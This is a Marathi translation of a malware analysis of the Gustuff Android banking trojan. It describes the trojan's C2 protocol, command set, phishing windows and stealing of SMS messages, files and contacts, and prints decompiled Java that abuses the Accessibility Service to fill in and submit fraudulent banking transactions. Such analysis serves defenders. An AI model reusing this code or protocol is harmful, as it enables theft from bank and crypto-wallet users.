🥇 Android Trojan Gustuff तुमच्या खात्यांमधून क्रीम (fiat आणि crypto) कसे स्किम करते

दुसऱ्या दिवशी ग्रुप-आय.बी माहिती दिली मोबाइल अँड्रॉइड ट्रोजन गस्टफच्या क्रियाकलापाबद्दल. हे 100 सर्वात मोठ्या परदेशी बँकांच्या क्लायंटवर, मोबाईल 32 क्रिप्टो वॉलेटचे वापरकर्ते, तसेच मोठ्या ई-कॉमर्स संसाधनांवर हल्ला करून केवळ आंतरराष्ट्रीय बाजारपेठांमध्ये कार्य करते. परंतु गस्टफचा विकसक हा बेस्टऑफर या टोपणनावाने रशियन भाषिक सायबर गुन्हेगार आहे. अलीकडे पर्यंत, त्यांनी "ज्ञान आणि अनुभव असलेल्या लोकांसाठी एक गंभीर उत्पादन" म्हणून त्याच्या ट्रोजनची प्रशंसा केली.

ग्रुप-IB मधील दुर्भावनापूर्ण कोड विश्लेषण विशेषज्ञ इव्हान पिसारेव त्याच्या संशोधनात, गस्टफ कसे कार्य करते आणि त्याचे धोके काय आहेत याबद्दल ते तपशीलवार बोलतात.

गस्टफ कोणासाठी शिकार करत आहे?

Gustuff पूर्णपणे स्वयंचलित कार्यांसह मालवेअरच्या नवीन पिढीशी संबंधित आहे. डेव्हलपरच्या मते, ट्रोजन अँडीबॉट मालवेअरची एक नवीन आणि सुधारित आवृत्ती बनली आहे, जे नोव्हेंबर 2017 पासून Android फोनवर हल्ला करत आहे आणि प्रसिद्ध आंतरराष्ट्रीय बँका आणि पेमेंट सिस्टमचे मोबाइल अॅप्लिकेशन म्हणून मास्करींग करून फिशिंग वेब फॉर्मद्वारे पैसे चोरत आहे. बेस्टऑफरने नोंदवले की Gustuff Bot भाड्याची किंमत प्रति महिना $800 होती.

गस्टफ नमुन्याच्या विश्लेषणातून असे दिसून आले की ट्रोजन संभाव्यतः बँक ऑफ अमेरिका, बँक ऑफ स्कॉटलंड, जेपी मॉर्गन, वेल्स फार्गो, कॅपिटल वन, टीडी बँक, पीएनसी बँक, तसेच क्रिप्टो वॉलेट यांसारख्या सर्वात मोठ्या बँकांचे मोबाइल अनुप्रयोग वापरून ग्राहकांना लक्ष्य करत आहे. Bitcoin Wallet, BitPay, Cryptopay, Coinbase, इ.

मूलतः क्लासिक बँकिंग ट्रोजन म्हणून तयार केले गेले, सध्याच्या आवृत्तीमध्ये Gustuff ने हल्ल्याच्या संभाव्य लक्ष्यांची सूची लक्षणीयरीत्या विस्तृत केली आहे. बँका, फिनटेक कंपन्या आणि क्रिप्टो सेवांसाठी अँड्रॉइड अॅप्लिकेशन्स व्यतिरिक्त, Gustuff चे लक्ष्य मार्केटप्लेस अॅप्लिकेशन्स, ऑनलाइन स्टोअर्स, पेमेंट सिस्टम आणि इन्स्टंट मेसेंजर्सच्या वापरकर्त्यांसाठी आहे. विशेषतः, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut आणि इतर.

प्रवेश बिंदू: वस्तुमान संसर्गाची गणना

एपीकेच्या लिंकसह एसएमएस मेलिंगद्वारे अँड्रॉइड स्मार्टफोनमध्ये प्रवेश करण्याच्या “क्लासिक” वेक्टरद्वारे Gustuff चे वैशिष्ट्य आहे. जेव्हा एखादे Android डिव्हाइस सर्व्हरच्या आदेशानुसार ट्रोजनने संक्रमित होते, तेव्हा गस्टफ संक्रमित फोनच्या संपर्क डेटाबेसद्वारे किंवा सर्व्हर डेटाबेसद्वारे पसरू शकते. Gustuff ची कार्यक्षमता मोठ्या प्रमाणात संसर्ग आणि त्याच्या ऑपरेटरच्या व्यवसायाचे जास्तीत जास्त भांडवलीकरण यासाठी डिझाइन केलेली आहे - यात कायदेशीर मोबाइल बँकिंग ऍप्लिकेशन्स आणि क्रिप्टो वॉलेटमध्ये एक अद्वितीय "ऑटो-फिल" फंक्शन आहे, जे तुम्हाला पैशांची चोरी वेगवान आणि स्केल करण्यास अनुमती देते.

ट्रोजनच्या अभ्यासातून असे दिसून आले आहे की अपंग लोकांसाठी सेवा, प्रवेशयोग्यता सेवा वापरून त्यात ऑटोफिल फंक्शन लागू केले गेले. ही Android सेवा वापरून इतर अनुप्रयोगांच्या विंडो घटकांसह परस्परसंवादापासून संरक्षणास यशस्वीपणे बायपास करणारा Gustuff हा पहिला ट्रोजन नाही. तथापि, कार फिलरसह प्रवेशयोग्यता सेवेचा वापर अजूनही दुर्मिळ आहे.

पीडिताच्या फोनवर डाउनलोड केल्यानंतर, ऍक्सेसिबिलिटी सेवेचा वापर करून, गस्टफ इतर ऍप्लिकेशन्सच्या विंडो घटकांशी संवाद साधण्यास सक्षम आहे (बँकिंग, क्रिप्टोकरन्सी, तसेच ऑनलाइन शॉपिंग, मेसेजिंग इ. ऍप्लिकेशन्स), हल्लेखोरांसाठी आवश्यक क्रिया करत आहे. . उदाहरणार्थ, सर्व्हरच्या आदेशानुसार, ट्रोजन बटण दाबू शकतो आणि बँकिंग अनुप्रयोगांमध्ये मजकूर फील्डची मूल्ये बदलू शकतो. ऍक्सेसिबिलिटी सर्व्हिस मेकॅनिझमचा वापर केल्याने ट्रोजनला मागील पिढीतील मोबाइल ट्रोजनचा मुकाबला करण्यासाठी बँकांद्वारे वापरल्या जाणाऱ्या सुरक्षा यंत्रणा तसेच Google द्वारे Android OS च्या नवीन आवृत्त्यांमध्ये लागू केलेल्या सुरक्षा धोरणातील बदलांना बायपास करण्याची अनुमती मिळते. अशा प्रकारे, गुस्टफला Google संरक्षण संरक्षण अक्षम करायचे "कसे माहित आहे": लेखकाच्या मते, हे कार्य 70% प्रकरणांमध्ये कार्य करते.

गस्टफ कायदेशीर मोबाईल ऍप्लिकेशन्सच्या आयकॉनसह बनावट पुश सूचना देखील प्रदर्शित करू शकते. वापरकर्ता पुश सूचनेवर क्लिक करतो आणि सर्व्हरवरून डाउनलोड केलेली फिशिंग विंडो पाहतो, जिथे तो विनंती केलेले बँक कार्ड किंवा क्रिप्टो वॉलेट डेटा प्रविष्ट करतो. दुसर्‍या Gustuff परिस्थितीमध्ये, अनुप्रयोग ज्याच्या वतीने PUSH सूचना प्रदर्शित केली होती ती उघडली आहे. या प्रकरणात, ऍक्सेसिबिलिटी सेवेद्वारे सर्व्हरकडून आदेश मिळाल्यावर मालवेअर, फसव्या व्यवहारासाठी बँकिंग अर्जाचे फॉर्म फील्ड भरू शकतो.

Gustuff च्या कार्यक्षमतेमध्ये सर्व्हरवर संक्रमित उपकरणाची माहिती पाठवणे, SMS संदेश वाचण्याची/पाठवण्याची क्षमता, USSD विनंत्या पाठवणे, SOCKS5 प्रॉक्सी लाँच करणे, लिंक फॉलो करणे, फाइल्स (दस्तऐवजांचे फोटो स्कॅन, स्क्रीनशॉट, छायाचित्रांसह) पाठवणे यांचा समावेश होतो. सर्व्हर, डिव्हाइसला फॅक्टरी सेटिंग्जवर रीसेट करा.

मालवेअर विश्लेषण

दुर्भावनापूर्ण अनुप्रयोग स्थापित करण्यापूर्वी, Android OS वापरकर्त्यास Gustuff द्वारे विनंती केलेल्या अधिकारांची सूची असलेली विंडो दर्शवते:

वापरकर्त्याची संमती मिळाल्यानंतरच अनुप्रयोग स्थापित केला जाईल. अनुप्रयोग लाँच केल्यानंतर, ट्रोजन वापरकर्त्यास एक विंडो दर्शवेल:

त्यानंतर ते त्याचे आयकॉन काढून टाकेल.

लेखकाच्या मते, FTT मधील पॅकरद्वारे गस्टफ पॅक केले जाते. स्टार्टअपनंतर, अनुप्रयोग वेळोवेळी आदेश प्राप्त करण्यासाठी CnC सर्व्हरशी संपर्क साधतो. आम्ही तपासलेल्या अनेक फायलींनी आयपी अॅड्रेस कंट्रोल सर्व्हर म्हणून वापरला ८८.९९.१७१[.]१०५ (यापुढे आम्ही ते असे दर्शवू <%CnC%>).

लॉन्च झाल्यानंतर, प्रोग्राम सर्व्हरला संदेश पाठविण्यास सुरुवात करतो http://<%CnC%>/api/v1/get.php.

प्रतिसाद खालील स्वरुपात JSON असणे अपेक्षित आहे:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
		<%Command parameters as JSON%>
        },
    },
}

प्रत्येक वेळी ऍप्लिकेशन ऍक्सेस केल्यावर, ते संक्रमित डिव्हाइसबद्दल माहिती पाठवते. संदेश स्वरूप खाली दर्शविले आहे. हे फील्ड लक्षात घेण्यासारखे आहे पूर्ण, अतिरिक्त, अनुप्रयोग и परवानगी - पर्यायी आणि केवळ CnC कडून विनंती आदेशाच्या बाबतीत पाठविला जाईल.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
}

कॉन्फिगरेशन डेटा संचयित करणे

Gustuff ऑपरेशनली महत्त्वाची माहिती प्राधान्य फाइलमध्ये साठवते. फाइलचे नाव, तसेच त्यातील पॅरामीटर्सची नावे, स्ट्रिंगमधून MD5 बेरीज मोजण्याचे परिणाम आहेत 15413090667214.6.1<%name%>कुठे <%name%> - प्रारंभिक नाव-मूल्य. नाव निर्मिती कार्याचे पायथन व्याख्या:

 nameGenerator(input):
    output = md5("15413090667214.6.1" + input)

पुढे आपण ते असे दर्शवू नेम जनरेटर (इनपुट).
तर पहिल्या फाईलचे नाव आहे: nameGenerator("API_SERVER_LIST"), त्यात खालील नावांची मूल्ये आहेत:

परिवर्तनीय नाव	मूल्य
nameGenerator("API_SERVER_LIST")	अॅरेच्या स्वरूपात CnC पत्त्यांची सूची समाविष्ट आहे.
nameGenerator("API_SERVER_URL")	CnC पत्ता समाविष्टीत आहे.
nameGenerator("SMS_UPLOAD")	ध्वज डीफॉल्टनुसार सेट केला जातो. ध्वज सेट केला असल्यास, CnC ला SMS संदेश पाठवते.
नेम जनरेटर("SMS_ROOT_NUMBER")	ज्या फोन नंबरवर संक्रमित उपकरणाद्वारे प्राप्त झालेले SMS संदेश पाठवले जातील. डीफॉल्ट शून्य आहे.
नेम जनरेटर("SMS_ROOT_NUMBER_RESEND")	ध्वज डीफॉल्टनुसार साफ केला जातो. स्थापित केले असल्यास, जेव्हा संक्रमित उपकरणास एसएमएस प्राप्त होतो, तेव्हा तो रूट क्रमांकावर पाठविला जाईल.
nameGenerator("DEFAULT_APP_SMS")	ध्वज डीफॉल्टनुसार साफ केला जातो. हा ध्वज सेट केला असल्यास, अनुप्रयोग येणार्‍या SMS संदेशांवर प्रक्रिया करेल.
nameGenerator("DEFAULT_ADMIN")	ध्वज डीफॉल्टनुसार साफ केला जातो. ध्वज सेट केला असल्यास, अनुप्रयोगास प्रशासक अधिकार आहेत.
nameGenerator("DEFAULT_ACCESSIBILITY")	ध्वज डीफॉल्टनुसार साफ केला जातो. ध्वज सेट केला असल्यास, प्रवेशयोग्यता सेवा वापरणारी सेवा चालू आहे.
nameGenerator("APPS_CONFIG")	JSON ऑब्जेक्ट ज्यामध्ये क्रियांची सूची असते ज्या विशिष्ट ऍप्लिकेशनशी संबंधित ऍक्सेसिबिलिटी इव्हेंट ट्रिगर झाल्यावर केल्या पाहिजेत.
nameGenerator("APPS_INSTALLED")	डिव्हाइसवर स्थापित केलेल्या अनुप्रयोगांची सूची संग्रहित करते.
nameGenerator("IS_FIST_RUN")	ध्वज पहिल्या प्रारंभी रीसेट केला जातो.
nameGenerator("UNIQUE_ID")	एक अद्वितीय अभिज्ञापक समाविष्टीत आहे. प्रथमच बॉट लाँच केल्यावर व्युत्पन्न केले.

सर्व्हरवरील आदेशांवर प्रक्रिया करण्यासाठी मॉड्यूल

अॅप्लिकेशन सीएनसी सर्व्हरचे पत्ते एन्कोड केलेल्या अॅरेच्या स्वरूपात संग्रहित करते बेस 85 ओळी योग्य आदेश मिळाल्यावर CnC सर्व्हरची यादी बदलली जाऊ शकते, अशा परिस्थितीत पत्ते प्राधान्य फाइलमध्ये संग्रहित केले जातील.

विनंतीला प्रतिसाद म्हणून, सर्व्हर अनुप्रयोगास एक आदेश पाठवतो. हे लक्षात घेण्यासारखे आहे की आदेश आणि पॅरामीटर्स JSON स्वरूपात सादर केले जातात. अनुप्रयोग खालील आदेशांवर प्रक्रिया करू शकतो:

संघ	वर्णन
फॉरवर्डस्टार्ट	संक्रमित उपकरणाद्वारे प्राप्त झालेले SMS संदेश CnC सर्व्हरला पाठवणे सुरू करा.
फॉरवर्डस्टॉप	सीएनसी सर्व्हरला संक्रमित उपकरणाद्वारे प्राप्त एसएमएस संदेश पाठवणे थांबवा.
ussdRun	USSD विनंती कार्यान्वित करा. तुम्‍हाला युएसएसडी विनंती करण्‍याची आवश्‍यकता असलेला क्रमांक JSON फील्ड "नंबर" मध्‍ये आहे.
एसएमएस पाठवा	एक एसएमएस संदेश पाठवा (आवश्यक असल्यास, संदेश भागांमध्ये "विभाजित" आहे). पॅरामीटर म्हणून, कमांड एक JSON ऑब्जेक्ट घेते ज्यामध्ये फील्ड "ते" - गंतव्य क्रमांक आणि "बॉडी" - संदेशाचा मुख्य भाग असतो.
SmsAb पाठवा	संक्रमित उपकरणाच्या संपर्क यादीतील प्रत्येकाला एसएमएस संदेश (आवश्यक असल्यास, संदेश "विभाजित" भागांमध्ये) पाठवा. संदेश पाठविण्‍यामध्‍ये अंतर 10 सेकंद आहे. संदेशाचा मुख्य भाग JSON फील्ड "बॉडी" मध्ये आहे
SmsMass पाठवा	कमांड पॅरामीटर्समध्ये निर्दिष्ट केलेल्या संपर्कांना एसएमएस संदेश (आवश्यक असल्यास, संदेश "विभाजित" भागांमध्ये) पाठवा. संदेश पाठवण्‍यामध्‍ये अंतर 10 सेकंद आहे. पॅरामीटर म्हणून, कमांड JSON अॅरे (“sms” फील्ड) घेते, ज्याच्या घटकांमध्ये “to” फील्ड असतात - गंतव्य क्रमांक आणि "बॉडी" - संदेशाचा मुख्य भाग.
चेंज सर्व्हर	ही कमांड पॅरामीटर म्हणून “url” की सह मूल्य घेऊ शकते - नंतर बॉट nameGenerator (“SERVER_URL”), किंवा “अॅरे” चे मूल्य बदलेल - नंतर बॉट अ‍ॅरेला nameGenerator (“API_SERVER_LIST”) वर लिहेल. अशा प्रकारे, अनुप्रयोग CnC सर्व्हरचा पत्ता बदलतो.
प्रशासक क्रमांक	कमांड रूट नंबरसह कार्य करण्यासाठी डिझाइन केले आहे. कमांड खालील पॅरामीटर्ससह JSON ऑब्जेक्ट स्वीकारते: “number” — nameGenerator(“ROOT_NUMBER”) प्राप्त व्हॅल्यूमध्ये बदला, “पुन्हा पाठवा” — nameGenerator बदला(“SMS_ROOT_NUMBER_RESEND”), “sendId” — nameGenerator (“ROOT_NUMBER”) ला पाठवा ) अद्वितीय आयडी.
अपडेट माहिती	संक्रमित उपकरणाची माहिती सर्व्हरला पाठवा.
डेटा पुसून टाका	कमांड वापरकर्त्याचा डेटा हटवण्याच्या उद्देशाने आहे. ॲप्लिकेशन कोणत्या नावाने लाँच केले आहे यावर अवलंबून, एकतर डिव्हाइस रीबूट (प्राथमिक वापरकर्ता) सह डेटा पूर्णपणे मिटविला जातो किंवा फक्त वापरकर्ता डेटा हटविला जातो (दुय्यम वापरकर्ता).
socksStart	प्रॉक्सी मॉड्यूल लाँच करा. मॉड्यूलचे ऑपरेशन वेगळ्या विभागात वर्णन केले आहे.
सॉक्सस्टॉप	प्रॉक्सी मॉड्यूल थांबवा.
उघडा लिंक	दुव्याचे अनुसरण करा. लिंक "url" की अंतर्गत JSON पॅरामीटरमध्ये स्थित आहे. लिंक उघडण्यासाठी “android.intent.action.VIEW” वापरला जातो.
AllSms अपलोड करा	डिव्हाइसद्वारे प्राप्त झालेले सर्व एसएमएस संदेश सर्व्हरवर पाठवा.
सर्व फोटो अपलोड करा	संक्रमित डिव्हाइसवरून URL वर प्रतिमा पाठवा. URL पॅरामीटर म्हणून येते.
अपलोड फाइल	संक्रमित डिव्हाइसवरून URL वर फाइल पाठवा. URL पॅरामीटर म्हणून येते.
फोन नंबर अपलोड करा	तुमच्या संपर्क सूचीमधून सर्व्हरला फोन नंबर पाठवा. पॅरामीटर म्हणून “ab” की असलेले JSON ऑब्जेक्ट मूल्य प्राप्त झाल्यास, अनुप्रयोगास फोन बुकमधून संपर्कांची सूची प्राप्त होते. "sms" की असलेली JSON ऑब्जेक्ट पॅरामीटर म्हणून प्राप्त झाल्यास, अनुप्रयोग SMS संदेश पाठविणाऱ्यांकडील संपर्कांची सूची वाचतो.
संग्रह बदला	अनुप्रयोग "url" की वापरून पॅरामीटर म्हणून आलेल्या पत्त्यावरून फाइल डाउनलोड करतो. डाउनलोड केलेली फाईल “archive.zip” नावाने सेव्ह केली आहे. ॲप्लिकेशन नंतर "b5jXh37gxgHBrZhQ4j3D" संग्रहण पासवर्ड वापरून, फाइल अनझिप करेल. अनझिप केलेल्या फाइल्स [बाह्य संचयन]/hgps निर्देशिकेत सेव्ह केल्या जातात. या निर्देशिकेत, अनुप्रयोग वेब बनावट संग्रहित करतो (खाली वर्णन केलेले).
क्रिया	कमांड कृती सेवेसह कार्य करण्यासाठी डिझाइन केले आहे, ज्याचे वर्णन वेगळ्या विभागात केले आहे.
चाचणी	काहीच करत नाही.
डाउनलोड	कमांडचा उद्देश रिमोट सर्व्हरवरून फाइल डाउनलोड करणे आणि "डाउनलोड" निर्देशिकेत सेव्ह करणे आहे. URL आणि फाइल नाव हे पॅरामीटर म्हणून येतात, JSON पॅरामीटर ऑब्जेक्टमधील फील्ड, अनुक्रमे: “url” आणि “fileName”.
दूर	"डाउनलोड" निर्देशिकेतून फाइल काढून टाकते. फाइलचे नाव JSON पॅरामीटरमध्ये “fileName” की सह येते. मानक फाइल नाव आहे “tmp.apk”.
सूचना	व्यवस्थापन सर्व्हरद्वारे परिभाषित वर्णन आणि शीर्षक मजकूरांसह सूचना दर्शवा.

आदेश स्वरूप सूचना:

{
    "results" : "OK",
    "command":{
    "id": <%id%>,
    "command":"notification",
    "timestamp":<%Server Timestamp%>,
    "params":{
        "openApp":<%Open original app or not%>,
        "array":[
                      {"title":<%Title text%>,
                      "desc":<%Description text%>,
                      "app":<%Application name%>}
                   ]
                   },
        },
}

तपासाधीन फाइलद्वारे व्युत्पन्न केलेली अधिसूचना फील्डमध्ये निर्दिष्ट केलेल्या अनुप्रयोगाद्वारे व्युत्पन्न केलेल्या सूचनांसारखीच दिसते अनुप्रयोग. फील्ड मूल्य असल्यास ओपन अॅप — खरे आहे, जेव्हा एखादी सूचना उघडली जाते, तेव्हा फील्डमध्ये निर्दिष्ट केलेला अनुप्रयोग लॉन्च केला जातो अनुप्रयोग. फील्ड मूल्य असल्यास ओपन अॅप - असत्य, मग:

एक फिशिंग विंडो उघडते, त्यातील सामग्री निर्देशिकेतून डाउनलोड केली जाते <%external storage%>/hgps/<%filename%>
एक फिशिंग विंडो उघडते, त्यातील सामग्री सर्व्हरवरून डाउनलोड केली जाते <%url%>?id=<%Bot id%>&app=<%Application name%>
एक फिशिंग विंडो उघडते, ती Google Play कार्डच्या वेशात, कार्ड तपशील प्रविष्ट करण्याच्या संधीसह.

अनुप्रयोग कोणत्याही आदेशाचा निकाल पाठवतो <%CnC%>set_state.php खालील स्वरूपात JSON ऑब्जेक्ट म्हणून:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    }
    "id":<%bot_id%>
}

क्रियासेवा
अनुप्रयोग प्रक्रियेत समाविष्ट असलेल्या आदेशांची सूची कारवाई. कमांड प्राप्त झाल्यावर, कमांड प्रोसेसिंग मॉड्यूल विस्तारित कमांड कार्यान्वित करण्यासाठी या सेवेमध्ये प्रवेश करते. सेवा पॅरामीटर म्हणून JSON ऑब्जेक्ट स्वीकारते. सेवा खालील आदेश कार्यान्वित करू शकते:

1. PARAMS_ACTION — अशी आज्ञा प्राप्त करताना, सेवा प्रथम JSON पॅरामीटरकडून टाइप कीचे मूल्य प्राप्त करते, जे खालीलप्रमाणे असू शकते:

सेवा माहिती - सबकमांडला जेएसओएन पॅरामीटरमधून की द्वारे मूल्य मिळते समाविष्ट नाही महत्वाचे. ध्वज सत्य असल्यास, अनुप्रयोग ध्वज सेट करतो FLAG_ISOLATED_PROCESS प्रवेशयोग्यता सेवा वापरून सेवेसाठी. अशा प्रकारे ही सेवा वेगळ्या प्रक्रियेने सुरू केली जाईल.
मूळ — सध्या फोकसमध्ये असलेल्या विंडोबद्दल सर्व्हरची माहिती प्राप्त करा आणि पाठवा. ऍप्लिकेशन AccessibilityNodeInfo क्लास वापरून माहिती मिळवते.
प्रशासन - प्रशासक अधिकारांची विनंती करा.
विलंब — “डेटा” की साठी पॅरामीटरमध्ये निर्दिष्ट केलेल्या मिलिसेकंदांच्या संख्येसाठी क्रियासेवा निलंबित करा.
विंडो — वापरकर्त्याला दृश्यमान विंडोची सूची पाठवा.
स्थापित करा - संक्रमित उपकरणावर अनुप्रयोग स्थापित करा. संग्रहण पॅकेजचे नाव “filename” की मध्ये आहे. संग्रहण स्वतः डाउनलोड निर्देशिकेत स्थित आहे.
जागतिक - उपकमांड वर्तमान विंडोमधून नेव्हिगेट करण्याच्या उद्देशाने आहे:
- द्रुत सेटिंग्ज मेनूवर
- परत
- मुख्यपृष्ठ
- सूचनांना
- अलीकडे उघडलेल्या ऍप्लिकेशन विंडोमध्ये
लाँच - अनुप्रयोग लाँच करा. ऍप्लिकेशनचे नाव की द्वारे पॅरामीटर म्हणून येते डेटा.
नाद - आवाज मोड शांत करण्यासाठी बदला.
अनलॉक — स्क्रीन आणि कीबोर्डचा बॅकलाइट पूर्ण ब्राइटनेसवर चालू करतो. अॅप्लिकेशन ही क्रिया WakeLock वापरून करते, [Application lable]:INFO टॅग म्हणून स्ट्रिंग निर्दिष्ट करते
परवानगी आच्छादन — फंक्शन अंमलात आणलेले नाही (कमांड एक्झिक्यूशनला प्रतिसाद म्हणजे {"message":"सपोर्ट नाही"} किंवा {"message":"low sdk"})
हावभाव — फंक्शन अंमलात आणलेले नाही (कमांड एक्झिक्यूशनला प्रतिसाद आहे {"message":"not support"}किंवा {"message":"Low API"})
परवानग्या — अर्जासाठी परवानग्या मागण्यासाठी हा आदेश आवश्यक आहे. तथापि, क्वेरी फंक्शन लागू केले जात नाही, म्हणून आदेश निरर्थक आहे. विनंती केलेल्या अधिकारांची सूची "परवानग्या" की सह JSON अॅरे म्हणून येते. मानक सूची:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
खुल्या - फिशिंग विंडो प्रदर्शित करा. सर्व्हरवरून येणार्‍या पॅरामीटरवर अवलंबून, अनुप्रयोग खालील फिशिंग विंडो प्रदर्शित करू शकतो:
- एक फिशिंग विंडो दर्शवा ज्याची सामग्री डिरेक्टरीमधील फाइलमध्ये लिहिलेली आहे <%बाह्य निर्देशिका%>/hgps/<%param_filename%>. विंडोसह वापरकर्त्याच्या परस्परसंवादाचा निकाल पाठविला जाईल <%CnC%>/records.php
- फिशिंग विंडो दर्शवा ज्याची सामग्री पत्त्यावरून प्री-लोड केलेली आहे <%url_param%>?id=<%bot_id%>&app=<%packagename%>. विंडोसह वापरकर्त्याच्या परस्परसंवादाचा निकाल पाठविला जाईल <%CnC%>/records.php
- Google Play कार्डच्या वेशात फिशिंग विंडो दाखवा.
परस्पर — कमांड अ‍ॅक्सेसिबिलिटी सर्व्हिसचा वापर करून इतर ऍप्लिकेशन्सच्या विंडो घटकांशी संवाद साधण्यासाठी डिझाइन केलेली आहे. कार्यक्रमात संवाद साधण्यासाठी विशेष सेवा कार्यान्वित करण्यात आली आहे. तपासाधीन अनुप्रयोग विंडोसह संवाद साधू शकतो:
- सध्या सक्रिय आहे. या प्रकरणात, पॅरामीटरमध्ये ऑब्जेक्टचा आयडी किंवा मजकूर (नाव) असतो ज्यासह आपल्याला संवाद साधण्याची आवश्यकता आहे.
- कमांड कार्यान्वित होताना वापरकर्त्यास दृश्यमान. अनुप्रयोग आयडीनुसार विंडो निवडतो.
प्राप्त वस्तू येत AccessibilityNodeInfo रूची असलेल्या विंडो घटकांसाठी, अनुप्रयोग, पॅरामीटर्सवर अवलंबून, खालील क्रिया करू शकतो:
- फोकस - ऑब्जेक्टवर फोकस सेट करा.
- क्लिक करा - ऑब्जेक्टवर क्लिक करा.
- actionId — ID द्वारे क्रिया करा.
- setText - ऑब्जेक्टचा मजकूर बदला. मजकूर बदलणे दोन प्रकारे शक्य आहे: कृती करा ACTION_SET_TEXT (संक्रमित डिव्हाइसची Android आवृत्ती पेक्षा लहान किंवा समान असल्यास लॉलीपॉप), किंवा क्लिपबोर्डवर स्ट्रिंग ठेवून आणि ऑब्जेक्टमध्ये पेस्ट करून (जुन्या आवृत्त्यांसाठी). हा आदेश बँकिंग ऍप्लिकेशनमधील डेटा बदलण्यासाठी वापरला जाऊ शकतो.

2. PARAMS_ACTIONS - च्या सारखे PARAMS_ACTION, आदेशांचा फक्त JSON अॅरे येतो.

असे दिसते की दुसर्‍या अनुप्रयोगाच्या विंडो घटकांशी संवाद साधण्याचे कार्य कसे दिसते याबद्दल बर्याच लोकांना स्वारस्य असेल. गस्टफमध्ये ही कार्यक्षमता कशी लागू केली जाते:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

मजकूर बदलण्याचे कार्य:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

अशा प्रकारे, कंट्रोल सर्व्हरच्या योग्य कॉन्फिगरेशनसह, Gustuff बँकिंग ऍप्लिकेशनमधील मजकूर फील्ड भरण्यास सक्षम आहे आणि व्यवहार पूर्ण करण्यासाठी आवश्यक असलेल्या बटणावर क्लिक करू शकते. ट्रोजनला ऍप्लिकेशनमध्ये लॉग इन करण्याची देखील आवश्यकता नाही-पुश सूचना प्रदर्शित करण्यासाठी कमांड पाठवणे आणि नंतर पूर्वी स्थापित केलेले बँकिंग ऍप्लिकेशन उघडणे पुरेसे आहे. वापरकर्ता स्वतःचे प्रमाणीकरण करेल, त्यानंतर Gustuff कार भरण्यास सक्षम असेल.

एसएमएस संदेश प्रक्रिया मॉड्यूल

